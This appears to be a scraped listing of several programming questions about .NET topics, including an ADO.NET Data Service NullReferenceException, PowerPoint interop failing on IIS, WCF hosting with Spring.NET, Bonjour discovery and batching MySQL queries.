    I receive an error message when exposing an ADO.NET Data Service using an Entity Framework data model that contains an entity (called "Case") with an internal setter on a property. If I modify the setter to be public (using the entity designer), the data service works fine. I don’t need the entity "Case" exposed in the data service, so I tried to limit which entities are exposed using SetEntitySetAccessRule. This didn’t work, and the service endpoint fails with the same error. public static void InitializeService(IDataServiceConfiguration config) { config.SetEntitySetAccessRule("User", EntitySetRights.AllRead); } The error message is reported in a browser when the .svc endpoint is called. It is very generic, and reads “Request Error. The server encountered an error processing the request. See server logs for more details.” Unfortunately, there are no entries in the System and Application event logs. I found this Stack Overflow question that shows how to configure tracing on the service. After doing so, the following NullReferenceException error was reported in the trace log. Does anyone know how to avoid this exception when including an entity with an internal setter? The trace entry (TraceHandledException, machine MOTOJIM) reads: Handling an exception. System.NullReferenceException (mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089): Object reference not set to an instance of an object. at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMemberMetadata(ResourceType resourceType, MetadataWorkspace workspace, IDictionary`2 entitySets, IDictionary`2 knownTypes) at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMetadata(IDictionary`2 knownTypes, IDictionary`2 entitySets) at System.Data.Services.Providers.BaseServiceProvider.PopulateMetadata() at System.Data.Services.DataService`1.CreateProvider(Type dataServiceType, Object dataSourceInstance, DataServiceConfiguration& configuration) at System.Data.Services.DataService`1.EnsureProviderAndConfigForRequest() at System.Data.Services.DataService`1.ProcessRequestForMessage(Stream messageBody) at SyncInvokeProcessRequestForMessage(Object, Object[], Object[]) at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs) at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage4(MessageRpc& rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage3(MessageRpc& rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage2(MessageRpc& rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage1(MessageRpc& rpc) at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean isOperationContextSet)

    Read the article

  • Problems with office automation in ASP.NET. I can use alternatives such as OpenOffice, if I knew how

    - by Vinicius Melquiades
    I have an ASP.NET 2.0 web application that should upload a ppt file and then extract its slides to images. For that I have imported the office.dll and Microsoft.Office.Interop.PowerPoint.dll assemblies and wrote the following code: public static int ExtractImages(string ppt, string targetPath, int width, int height) { var pptApplication = new ApplicationClass(); var pptPresentation = pptApplication.Presentations.Open(ppt, MsoTriState.msoTrue, MsoTriState.msoFalse, MsoTriState.msoFalse); var slides = new List<string>(); for (var i = 1; i <= pptPresentation.Slides.Count; i++) { var target = string.Format(targetPath, i); pptPresentation.Slides[i].Export(target, "jpg", width, height); slides.Add(new FileInfo(target).Name); } pptPresentation.Close(); return slides.Count; } If I run this code on my local machine, in ASP.NET or an executable, it runs perfectly. But if I try running it on the production server, I get the following error: System.Runtime.InteropServices.COMException (0x80004005): PowerPoint could not open the file. at Microsoft.Office.Interop.PowerPoint.Presentations.Open(String FileName, MsoTriState ReadOnly, MsoTriState Untitled, MsoTriState WithWindow) at PPTImageExtractor.PptConversor.ExtractImages(String caminhoPpt, String caminhoDestino, Int32 largura, Int32 altura, String caminhoThumbs, Int32 larguraThumb, Int32 alturaThumb, Boolean geraXml) at Upload.ProcessRequest(HttpContext context) The process is running as the user NT AUTHORITY\NETWORK SERVICE. IIS is configured to use anonymous authentication. The anonymous user is an administrator; I set it like this to allow the application to run without having to worry about permissions. On my development machine I have Office 2010 Beta 1. I have tested with the executable on a PC with Office 2007 as well. And if I run the code from the executable on the server, with Office 2003 installed, it runs perfectly. To ensure that there wouldn't be any problems with permissions, everyone on the server has full access to the web site. The website is running in IIS7 and Classic Mode. I also heard that OpenOffice has an API that should be able to do this, but I couldn't find anything about it. I don't mind using DllImport to do what I have to do and I can install OpenOffice on the web server. Don't worry about rewriting this method; as long as the parameters are the same, everything will work. I appreciate your help. PS: Sorry for my bad English.

    Read the article

  • How to track Google Analytics Events in Server Side asp.net?

    - by Raj
    Hello, Is there a way to track Google Analytics Events from the server side in ASP.NET? The requirement is that the Event should be tracked on button click after some functionality has executed on the server side. With OnClientClick of the button, we cannot fulfill this requirement completely, as sometimes the server-side functionality can fail but the event will still get tracked in Google. Please help me in this regard. Appreciate expert answers. Thanks in Advance, Raj

    Read the article

  • Managed (.net) library with html-tidy like functionality?

    - by Eamon Nerbonne
    Does anybody know of an HTML cleaner for .NET that can parse HTML and (for instance) convert it to a more machine friendly format such as XHTML? I've tried the HTML Agility Pack, but that fails to correctly parse even fairly simple examples. To give an example of HTML that should be parsed correctly: <html><body> <ul><li>TestElem1 <li>TestElem2 <li>TestElem3 List: <ul><li>Nested1 <li>Nested2</li> <li>Nested3 </ul> <li>TestElem4 </ul> <p>paragraph 1 <p>paragraph 2 <p>paragraph 3 </body></html> li tags don't need to be closed (see spec), and neither do p tags. In other words, the above sample should be parsed as: <html><body> <ul><li>TestElem1</li> <li>TestElem2</li> <li>TestElem3 List: <ul><li>Nested1</li> <li>Nested2</li> <li>Nested3</li> </ul></li> <li>TestElem4</li> </ul> <p>paragraph 1</p> <p>paragraph 2</p> <p>paragraph 3</p> </body></html> Since the aim is to use the library on various machines, it's a big disadvantage to need to fall back to native code (such as a wrapper around HTML Tidy) which would require extra deployment hassle and sacrifice platform independence. Any suggestions? To recap, I'm looking for: An HTML cleaner a la HTML Tidy. Must be able to deal with real world HTML, not just XHTML - at the very least correctly reading valid HTML 4. Must be able to convert to a more easily processable XML format. Should be a purely managed app.
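
    For reference, a hedged sketch of the HTML Agility Pack route mentioned above (assumed usage, not confirmed working code; as noted, it may still mis-nest the unclosed li example):

        using System.IO;
        using HtmlAgilityPack;

        static class TidySketch
        {
            // Loads messy HTML and writes it back out as well-formed XML.
            static string ToXhtml(string html)
            {
                var doc = new HtmlDocument();
                doc.OptionFixNestedTags = true;   // attempt to repair mis-nested tags
                doc.OptionOutputAsXml = true;     // emit well-formed XML on save
                doc.LoadHtml(html);

                using (var writer = new StringWriter())
                {
                    doc.Save(writer);
                    return writer.ToString();
                }
            }
        }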

    Read the article

  • ASP.NET How can I write a message on the screen without the end user removing it?

    - by LeeW
    I have written an ASP.NET program for a customer. I want to add a message similar to "Preview version, ABD Consulting" on the master.master page. I had thought to use Response.Write but it messes up the look of the page as it seems to move page elements. If I use a label the customer can remove it from the Master.master file. Any suggestions? The customer is in a different country so I want to ensure I'm paid. Many thanks

    Read the article

  • WCF using Spring.NET woes

    - by demius
    Hi everyone, I've torn out all but two hairs on my head trying to get my WCF services hosted in IIS 7.5. I'm using Spring.NET to create my service instances, but I'm having no luck getting it up and running. I encounter the following exception: Could not find a base address that matches scheme http for the endpoint with binding MetadataExchangeHttpBinding. Registered base address schemes are []. My WCF configuration is as follows: <system.serviceModel> <bindings> <wsHttpBinding> <binding name="secureBinding" allowCookies="false"> <security mode="Transport"> <transport clientCredentialType="None"> <extendedProtectionPolicy policyEnforcement="Never" /> </transport> </security> </binding> </wsHttpBinding> </bindings> <behaviors> <serviceBehaviors> <behavior> <serviceMetadata httpGetEnabled="true" httpsGetEnabled="true" /> <serviceDebug includeExceptionDetailInFaults="false" /> </behavior> </serviceBehaviors> </behaviors> <services> <service name="TestService"> <host> <baseAddresses> <add baseAddress="https://ws.local.com/TestService.svc"/> </baseAddresses> </host> <endpoint name="secureEndpoint" contract="Services.Interfaces.ITestService" binding="wsHttpBinding" bindingConfiguration="secureBinding" address="https://ws.local.com/TestService.svc" /> <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" /> </service> </services> <serviceHostingEnvironment multipleSiteBindingsEnabled="true" /> What am I missing here?

    Read the article

  • Using Apple’s Bonjour service from .NET?

    - by Martín Marconcini
    I have an iPhone app that publishes through Bonjour. The Mac counterpart works; they sync and exchange data. Now I have to port that little Mac app to Windows. I’ve decided to go with .NET (because that’s what I know). The app is not complex, but I’m in the early stages. I need to browse/discover Bonjour services. For this task, I’ve downloaded Mono.Zeroconf and Apple’s latest SDK (which includes a couple of C# samples). I’m not really pasting code because I’m really copy/pasting the samples. In fact, Mono.Zeroconf has a MZClient.exe that can be used to test “all the API”. My 1st test was – on the same box – to open two cmd.exe windows and launch an MZClient registering a service in one, and on the other, launch it and “discover it”. It doesn’t work. Here’s the server: C:\MZ>MZClient -v -p "_http._tcp 80 mysimpleweb" *** Registering name = 'mysimpleweb', type = '_http._tcp', domain = 'local.' *** Registered name = 'mysimpleweb' On the other terminal: c:\MZ>MZClient -v -t "_http._tcp" Creating a ServiceBrowser with the following settings: Interface = 0 (All) Address Protocol = Any Domain = local Registration Type = _http._tcp Resolve Shares = False Hit ^C when you're bored waiting for responses. And that’s it. Nothing happens. I’ve of course tried with different services to no avail. Even played a little bit with that domain thing. Remember this is the same box. I tried on another computer, because this was a VM inside OSX, so I went ahead and tried on a “pure” Win XP. Nothing. note: I have Apple Bonjour Service (up and running) and also the Apple SDK (installed later). Given that this didn’t work, I went ahead and decided to try the Apple SDK which has an Interop and a few pre-compiled samples (and its source code). Short story, neither the mDSNBrowser.exe nor the SimpleChat.exe work/see/discover anything. My box is a Win7 under Parallels, but that doesn’t seem to be affecting anything, given that the native XP exhibits the same problems. What am I doing so awfully wrong?
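
    For comparison with the MZClient runs above, a hedged sketch of the browse side in code with Mono.Zeroconf - the API names are recalled from the library's samples, so treat the signatures as approximate rather than authoritative:

        using System;
        using Mono.Zeroconf;

        class BrowseSketch
        {
            static void Main()
            {
                // Browse for the same registration type used above.
                var browser = new ServiceBrowser();
                browser.ServiceAdded += delegate(object o, ServiceBrowseEventArgs args)
                {
                    Console.WriteLine("Found service: {0}", args.Service.Name);
                };
                browser.Browse("_http._tcp", "local");

                Console.WriteLine("Press Enter to stop browsing.");
                Console.ReadLine();
            }
        }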

    Read the article

  • MySql multiple selects batching in .net

    - by Amith George
    I have a situation in my application. For each x-axis point in my chart, I am plotting 5 y-axis values. To calculate each of these 5 values, I need to make 4 different queries. I.e., for each x-axis point I need to fire 20 SQL queries. Now, I need to plot 40 such points in my chart. It's resulting in pathetic performance where it takes close to a minute to get all the data back from the database. Each of the 4 different queries consists of a join between 2 tables. One has only 6 rows. The other close to 10,000. Each of the 4 queries has different WHERE clauses, so they are different queries. For each point on the x-axis, only the values for the where clauses change. I have tried combining each of the 4 queries into one big string. Basically batching the four selects. These are again batched for each y-axis value. So, for each x-axis point, I am now firing one big command that consists of 20 different select statements. Technically, I should be experiencing a big performance boost, right? Instead of hitting the db 40x5x4 = 800 times, I am now hitting it just 40 times. But instead of taking 60 seconds, it takes 50-55 seconds... not much of a help. I am using MySql 5.1, and the 6.1 version of its .Net connector. What can I do to improve the performance? Edit: One of the 4 queries is as follows: SELECT SUM(TIME_TO_SEC(TIMEDIFF(T1.col2, T1.col1))* T2.col1 / (3600 *1000)) AS TotalTime FROM Table T1 JOIN Table T2 ON T1.col3 = T2.col3 WHERE T1.col4 = 'i' AND T1.col1 >= '2009-12-25 00:00:00' AND T1.col2 <= '2009-12-26 00:00:00'; The other 3 queries are similar, only the where clause changes slightly. This set of 4 queries is fired 5 times. The first 3 times against the join of table T1 and T2, passing in different values for col4. And the next two times against the join of table T3 and T2, passing in different values for col4. These 5 values are the y-axis values for a particular x-axis point. The data returned by all these queries is in the same format. So, we tried doing a UNION ALL on all these queries. No substantial difference. One strange thing, however: after indexing the foreign key on table T1 [while it contained over a lakh (100,000) records], the queries were using the index, but they had become slower. At times, the queries would take double the time to return the data.
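
    For what it's worth, a hedged sketch of how a batched command's result sets are typically consumed with the .NET connector - the connection string, SQL text and column position below are placeholders, not the asker's code:

        using MySql.Data.MySqlClient;

        static class BatchSketch
        {
            static void ReadBatched(string connectionString, string batchedSql)
            {
                using (var conn = new MySqlConnection(connectionString))
                using (var cmd = new MySqlCommand(batchedSql, conn))
                {
                    conn.Open();
                    using (var reader = cmd.ExecuteReader())
                    {
                        do
                        {
                            while (reader.Read())
                            {
                                // First column of the current SELECT in the batch.
                                object totalTime = reader.GetValue(0);
                            }
                        } while (reader.NextResult()); // advance to the next SELECT's result set
                    }
                }
            }
        }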

    Read the article
